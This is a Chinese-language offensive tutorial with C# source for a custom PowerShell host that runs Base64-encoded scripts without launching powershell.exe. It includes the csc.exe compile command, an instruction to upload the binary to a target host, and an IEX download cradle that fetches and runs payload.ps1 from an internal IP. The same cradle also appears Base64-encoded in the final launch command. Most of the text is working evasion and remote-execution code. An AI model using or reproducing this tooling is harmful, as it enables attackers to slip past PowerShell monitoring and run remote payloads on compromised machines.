通过代码直接调用System.Management,替代powershell.exe
c#代码,保存为1.cs:
1.using System.Collections.ObjectModel;
2.using System.Management.Automation;
3.using System.Management.Automation.Runspaces;
4.using System.IO;
5.using System;
6.using System.Text;
namespace PSLess
{
    // Custom host for the PowerShell engine: decodes a Base64 argument and runs it
    // through System.Management.Automation instead of spawning powershell.exe.
    // Detection note: a non-PowerShell process loading System.Management.Automation.dll
    // is itself a module-load signal, and engine-level telemetry (script block logging,
    // AMSI on v5+ engines) presumably still applies inside the hosted runspace — which
    // engine version is used depends on the assembly referenced at compile time.
    class PSLess
    {
        // Entry point. args[0] is the Base64-encoded script; the process exits with
        // code 1 when no argument is given. The script's text output is written to
        // the console, then the process blocks until a key is pressed.
        static void Main(string[] args)
        {
            if(args.Length ==0)
                Environment.Exit(1);
            string temp = Base64Decode(args[0]);
            string s=RunScript(temp);
            Console.WriteLine(s);
            Console.ReadKey();
        }

        // Decodes a Base64 string using Encoding.Default (the system ANSI code page on
        // .NET Framework, not UTF-8), so non-ASCII script content depends on the host's
        // locale. Throws FormatException when the input is not valid Base64.
        public static string Base64Decode(string s)
        {
            return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
        }

        // Runs `script` in a fresh runspace, pipes the result through Out-String and
        // returns the concatenated text, one line per output object.
        // Note: the runspace is closed only on the happy path — an exception from
        // Open() or Invoke() skips MyRunspace.Close(), and the runspace is never disposed.
        private static string RunScript(string script)
        {
            Runspace MyRunspace = RunspaceFactory.CreateRunspace();
            MyRunspace.Open();
            Pipeline MyPipeline = MyRunspace.CreatePipeline();
            MyPipeline.Commands.AddScript(script);
            // Out-String renders the pipeline objects as formatted text, so the
            // ToString() calls below yield readable lines rather than type names.
            MyPipeline.Commands.Add("Out-String");
            Collection<PSObject> outputs = MyPipeline.Invoke();
            MyRunspace.Close();
            StringBuilder sb = new StringBuilder();
            foreach (PSObject pobject in outputs)
            {
                sb.AppendLine(pobject.ToString());
            }
            return sb.ToString();
        }
    }
}
利用CSC(编译C#)进行,电脑路径自己找一下,编译:
1.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /out:D:/power_base64.exe 1.cs
将exe上传到目标主机,用base64编码加载:
1.base64编码语句
2.
3.IEX ((new-object net.webclient).downloadstring('http://192.168.0.14/payload.ps1'))
1.Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDMuMTAwLzEvcGF5bG9hZC5wczEnKSk="